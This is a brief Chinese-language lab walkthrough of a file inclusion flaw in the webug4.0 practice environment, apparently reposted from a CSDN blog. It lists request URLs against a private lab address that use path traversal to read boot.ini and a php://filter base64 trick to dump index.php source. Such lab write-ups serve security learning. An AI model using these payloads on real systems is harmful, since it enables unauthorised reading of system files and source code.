webug4.0-文件包含漏洞

0x01 漏洞利用

1.打开页面看见url的暗示。。

http://192.168.72.136/control/more/file_include.php?filename=../../template/dom_xss.html

2.读取boot.ini

http://192.168.72.136/control/more/file_include.php?filename=../../../../boot.ini

想要读取其他敏感文件而不知道路径的请看我这篇文章。

控制好路径即可。

3.查看index.php源文件

192.168.72.136/control/more/file_include.php?filename=php://filter/read=convert.base64-encode/resource=../../index.php

base64编码直接解密就可以看到源码了。

0x02 结语

单

来源：51CTO

作者：nex1less

链接：https://blog.csdn.net/nex1less/article/details/100009575

标签

易学教程内所有资源均来自网络或用户发布的内容，如有违反法律规定的内容欢迎反馈！
该文章没有解决你所遇到的问题?点击提问,说说你的问题,让更多的人一起探讨吧!